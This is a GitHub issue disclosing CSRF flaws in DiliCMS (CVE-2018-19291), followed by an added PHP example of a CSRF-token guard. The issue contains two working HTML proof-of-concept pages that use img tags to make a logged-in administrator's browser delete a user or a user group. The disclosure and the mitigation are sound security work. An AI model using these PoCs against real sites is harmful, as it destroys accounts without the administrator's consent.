This repository has been archived by the owner on Jan 10, 2019. It is now read-only.

There are two CSRF vulnerabilities that can delete user or usergroup #60

Open
Rich4ever opened this issue Nov 11, 2018 · 1 comment
@Rich4ever

Software Link: https://github.com/chekun/DiliCMS
After the administrator has logged in, open the page.
test.html delete user POC:

<html>
  <body>
    <img src="http://127.0.0.1/DiliCMS/admin/index.php/user/del/1" />
  </body>
</html>

test2.html delete group POC:

<html>
  <body>
    <img src="http://127.0.0.1/DiliCMS/admin/index.php/role/del/2" />
  </body>
</html>

@fgeek

fgeek commented Nov 16, 2018

Please use https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19291 for this vulnerability.
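
The two PoCs in this issue work because a delete runs on a plain GET that carries no secret tied to the administrator's session. A guard for such actions, as an added example that is not DiliCMS code or part of the original issue; the function names and the `csrf_token` field are hypothetical, and PHP 7.1+ is assumed:

```php
<?php
// Added example, not DiliCMS code: a guard for state-changing admin actions
// such as user/del/<id> and role/del/<id>. All function names are hypothetical.

// Issue one random token per session; it is embedded in every delete form.
function csrf_issue_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Return null when the request may proceed, or a reason string to reject it.
function csrf_reject_reason(string $method, array $post, array $session): ?string
{
    // An <img> tag can only issue GET, so deletes must never run on GET.
    if (strtoupper($method) !== 'POST') {
        return 'state-changing action requires POST';
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    // hash_equals compares in constant time; reject empty or non-string input first.
    if (!is_string($supplied) || $expected === '' ||
        !hash_equals($expected, $supplied)) {
        return 'missing or invalid CSRF token';
    }
    return null;
}

// Constructed requests: the issue's <img> PoC, a forged POST, a real form post.
$session = [];
$token = csrf_issue_token($session);
$cases = [
    'img-tag GET'     => ['GET',  []],
    'cross-site POST' => ['POST', []],
    'admin form POST' => ['POST', ['csrf_token' => $token]],
];
foreach ($cases as $name => [$method, $post]) {
    $reason = csrf_reject_reason($method, $post, $session);
    printf("%-16s %s\n", $name, $reason === null ? 'allowed' : "rejected: $reason");
}
```

In a real controller the guard would run before the delete, with `$_SERVER['REQUEST_METHOD']`, `$_POST` and `$_SESSION` passed in place of the constructed arrays.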
